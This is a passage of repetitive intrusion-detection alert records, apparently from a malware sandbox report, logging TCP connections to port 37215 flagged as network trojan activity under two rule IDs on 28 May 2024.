                  Source Port:37190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545070
                  SID:2835222
                  Source Port:45142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315804
                  SID:2835222
                  Source Port:47908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887067
                  SID:2835222
                  Source Port:56274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678805
                  SID:2829579
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.644117
                  SID:2835222
                  Source Port:50980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551044
                  SID:2835222
                  Source Port:35612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315651
                  SID:2835222
                  Source Port:52148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277310
                  SID:2829579
                  Source Port:60870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.301013
                  SID:2829579
                  Source Port:58292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583521
                  SID:2835222
                  Source Port:35332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510642
                  SID:2835222
                  Source Port:42124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529986
                  SID:2829579
                  Source Port:44930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543418
                  SID:2835222
                  Source Port:43804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551953
                  SID:2835222
                  Source Port:48512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276282
                  SID:2835222
                  Source Port:60170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591028
                  SID:2829579
                  Source Port:35866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488157
                  SID:2829579
                  Source Port:60656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799454
                  SID:2835222
                  Source Port:37524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860120
                  SID:2829579
                  Source Port:59560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908009
                  SID:2835222
                  Source Port:50502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849038
                  SID:2829579
                  Source Port:48482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300194
                  SID:2829579
                  Source Port:38690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790957
                  SID:2835222
                  Source Port:36048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767732
                  SID:2835222
                  Source Port:45676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796770
                  SID:2829579
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490418
                  SID:2829579
                  Source Port:33092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548281
                  SID:2829579
                  Source Port:32984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278210
                  SID:2835222
                  Source Port:47134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492480
                  SID:2835222
                  Source Port:57346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628018
                  SID:2829579
                  Source Port:36374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684208
                  SID:2829579
                  Source Port:40934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585425
                  SID:2829579
                  Source Port:41152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770860
                  SID:2829579
                  Source Port:52466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766221
                  SID:2829579
                  Source Port:45050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277650
                  SID:2835222
                  Source Port:34404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650835
                  SID:2835222
                  Source Port:59232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912512
                  SID:2829579
                  Source Port:38234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926918
                  SID:2829579
                  Source Port:41120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548281
                  SID:2829579
                  Source Port:57960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494713
                  SID:2829579
                  Source Port:35462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628545
                  SID:2829579
                  Source Port:48884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493576
                  SID:2829579
                  Source Port:47844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695722
                  SID:2835222
                  Source Port:50282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517522
                  SID:2835222
                  Source Port:39888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578664
                  SID:2829579
                  Source Port:54676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789441
                  SID:2829579
                  Source Port:41650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595892
                  SID:2829579
                  Source Port:58762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.322583
                  SID:2829579
                  Source Port:39928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795470
                  SID:2829579
                  Source Port:60110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545047
                  SID:2829579
                  Source Port:36726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628377
                  SID:2829579
                  Source Port:50128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650384
                  SID:2829579
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529101
                  SID:2835222
                  Source Port:41468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496794
                  SID:2835222
                  Source Port:57156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749972
                  SID:2829579
                  Source Port:51924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279383
                  SID:2835222
                  Source Port:45174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737931
                  SID:2829579
                  Source Port:39332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798521
                  SID:2835222
                  Source Port:36566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528216
                  SID:2829579
                  Source Port:57408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.802030
                  SID:2835222
                  Source Port:49570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788984
                  SID:2835222
                  Source Port:47406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.791008
                  SID:2829579
                  Source Port:46022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.453796
                  SID:2829579
                  Source Port:52166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544286
                  SID:2829579
                  Source Port:37054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918153
                  SID:2829579
                  Source Port:32822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528233
                  SID:2835222
                  Source Port:33290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.670732
                  SID:2829579
                  Source Port:55424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319925
                  SID:2829579
                  Source Port:37294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885415
                  SID:2829579
                  Source Port:45180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868967
                  SID:2829579
                  Source Port:39924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292806
                  SID:2835222
                  Source Port:35284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791325
                  SID:2829579
                  Source Port:51578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584438
                  SID:2835222
                  Source Port:60650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588690
                  SID:2835222
                  Source Port:53664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766539
                  SID:2835222
                  Source Port:35868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785806
                  SID:2835222
                  Source Port:42344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795550
                  SID:2829579
                  Source Port:49060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.596682
                  SID:2829579
                  Source Port:46102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.658965
                  SID:2835222
                  Source Port:48760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277335
                  SID:2829579
                  Source Port:37748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.608566
                  SID:2829579
                  Source Port:36954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788085
                  SID:2835222
                  Source Port:57686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926516
                  SID:2835222
                  Source Port:59666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798245
                  SID:2835222
                  Source Port:43990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771309
                  SID:2829579
                  Source Port:43876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912518
                  SID:2835222
                  Source Port:53856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.546596
                  SID:2835222
                  Source Port:38804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846608
                  SID:2835222
                  Source Port:43094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583706
                  SID:2835222
                  Source Port:54344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487899
                  SID:2829579
                  Source Port:36930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.544604
                  SID:2829579
                  Source Port:34608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530991
                  SID:2829579
                  Source Port:58406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886576
                  SID:2829579
                  Source Port:40830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489930
                  SID:2829579
                  Source Port:38340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785690
                  SID:2829579
                  Source Port:60626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702706
                  SID:2829579
                  Source Port:54672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794633
                  SID:2835222
                  Source Port:32778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887214
                  SID:2829579
                  Source Port:32952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487967
                  SID:2829579
                  Source Port:40802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548309
                  SID:2829579
                  Source Port:33200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543481
                  SID:2829579
                  Source Port:54626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.861322
                  SID:2835222
                  Source Port:40826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888374
                  SID:2835222
                  Source Port:58508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537473
                  SID:2829579
                  Source Port:50846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586903
                  SID:2835222
                  Source Port:45324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493512
                  SID:2829579
                  Source Port:53754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490201
                  SID:2829579
                  Source Port:48392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664770
                  SID:2829579
                  Source Port:40572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887264
                  SID:2835222
                  Source Port:38142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907276
                  SID:2829579
                  Source Port:38662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577777
                  SID:2829579
                  Source Port:58034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276206
                  SID:2835222
                  Source Port:41908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926918
                  SID:2835222
                  Source Port:41120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788973
                  SID:2835222
                  Source Port:47998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496073
                  SID:2835222
                  Source Port:44204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788953
                  SID:2829579
                  Source Port:58998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.600647
                  SID:2835222
                  Source Port:58012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926516
                  SID:2835222
                  Source Port:51706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542684
                  SID:2835222
                  Source Port:52362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695680
                  SID:2829579
                  Source Port:56784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.808806
                  SID:2829579
                  Source Port:35064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316500
                  SID:2829579
                  Source Port:39048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529238
                  SID:2835222
                  Source Port:41666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926510
                  SID:2835222
                  Source Port:54110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845224
                  SID:2829579
                  Source Port:58710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870646
                  SID:2829579
                  Source Port:58314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926057
                  SID:2835222
                  Source Port:48108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665478
                  SID:2835222
                  Source Port:40428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678722
                  SID:2829579
                  Source Port:53290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277633
                  SID:2829579
                  Source Port:44126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673792
                  SID:2829579
                  Source Port:48954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719837
                  SID:2835222
                  Source Port:41200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.882592
                  SID:2829579
                  Source Port:39610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629276
                  SID:2835222
                  Source Port:50478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550962
                  SID:2835222
                  Source Port:58608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742831
                  SID:2829579
                  Source Port:40120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545070
                  SID:2829579
                  Source Port:45142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294543
                  SID:2835222
                  Source Port:48170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847354
                  SID:2829579
                  Source Port:53284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584524
                  SID:2835222
                  Source Port:56186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806010
                  SID:2829579
                  Source Port:40226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528177
                  SID:2835222
                  Source Port:35022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661515
                  SID:2829579
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661670
                  SID:2835222
                  Source Port:32924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536751
                  SID:2829579
                  Source Port:34220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578050
                  SID:2829579
                  Source Port:53026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591073
                  SID:2835222
                  Source Port:45732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298967
                  SID:2829579
                  Source Port:41772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488816
                  SID:2835222
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885400
                  SID:2835222
                  Source Port:44210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906712
                  SID:2829579
                  Source Port:56440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906780
                  SID:2829579
                  Source Port:56110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587011
                  SID:2835222
                  Source Port:51870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916686
                  SID:2829579
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584668
                  SID:2829579
                  Source Port:59002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766338
                  SID:2835222
                  Source Port:33336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795805
                  SID:2829579
                  Source Port:42282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920402
                  SID:2829579
                  Source Port:34020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549282
                  SID:2829579
                  Source Port:34486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651748
                  SID:2829579
                  Source Port:38142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696013
                  SID:2829579
                  Source Port:53866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323034
                  SID:2835222
                  Source Port:43240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904733
                  SID:2829579
                  Source Port:35724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660450
                  SID:2829579
                  Source Port:49348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.662057
                  SID:2829579
                  Source Port:48660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.532180
                  SID:2829579
                  Source Port:60582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755613
                  SID:2835222
                  Source Port:32802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886287
                  SID:2829579
                  Source Port:33928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846380
                  SID:2829579
                  Source Port:34580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604381
                  SID:2835222
                  Source Port:54172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649662
                  SID:2835222
                  Source Port:56180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887911
                  SID:2835222
                  Source Port:55352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887067
                  SID:2829579
                  Source Port:56274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664869
                  SID:2829579
                  Source Port:44298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886654
                  SID:2835222
                  Source Port:50666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.602013
                  SID:2835222
                  Source Port:44332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278228
                  SID:2835222
                  Source Port:42102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584437
                  SID:2835222
                  Source Port:38774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492458
                  SID:2829579
                  Source Port:41456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781097
                  SID:2829579
                  Source Port:40130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912234
                  SID:2835222
                  Source Port:38132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579594
                  SID:2835222
                  Source Port:50382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496760
